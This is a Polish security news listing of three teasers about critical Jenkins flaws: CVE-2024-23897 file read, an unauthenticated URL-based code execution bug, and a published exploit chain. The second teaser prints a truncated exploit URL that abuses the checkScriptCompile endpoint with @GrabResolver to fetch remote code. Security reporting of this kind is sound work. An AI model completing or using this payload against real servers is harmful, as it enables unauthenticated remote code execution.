Deweloperzy Jenkinsa opublikowali kolejną wersję ich flagowego narzędzia, która łata dziewięć podatności. Jedna z nich otrzymała identyfikator CVE-2024-23897 i zgodnie z opublikowaną notką oceniana jest jako krytyczna, bo pozwala na odczyt dowolnych plików przez tekstowy interfejs użytkownika, a w najgorszym przypadku może prowadzić do zdalnego wykonania kodu (RCE). Na blogu…
Czytaj dalej »
Akcja na filmie tutaj poniżej. Sam exploit jest stosunkowo prosty (do stworzenia od zera nawet na poczekaniu) – choć dojście do niego zdecydowanie nie było banalne. Całość sprowadza się do przygotowania na swojej maszynie stosownego pliku, a następnie odwołanie się do Jenkinsa (bez uwierzytelnienia) zwykłą przeglądarką: http://jenkins.local/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name=’orange.tw’,…
Czytaj dalej »
Problem opisany jest w ramach ID: SECURITY-595: Code execution through crafted URLs (błąd jest krytyczny, w skali CVSS 9.8 / 10, nie wymaga uwierzytelnienia). W skrócie, można wołać prawdopodobnie niemal dowolne metody javowe, korzystając właśnie z odpowiedniej konstrukcji URL-a: (…) any public method whose name starts with get, and that has a String, int, long,…
Czytaj dalej »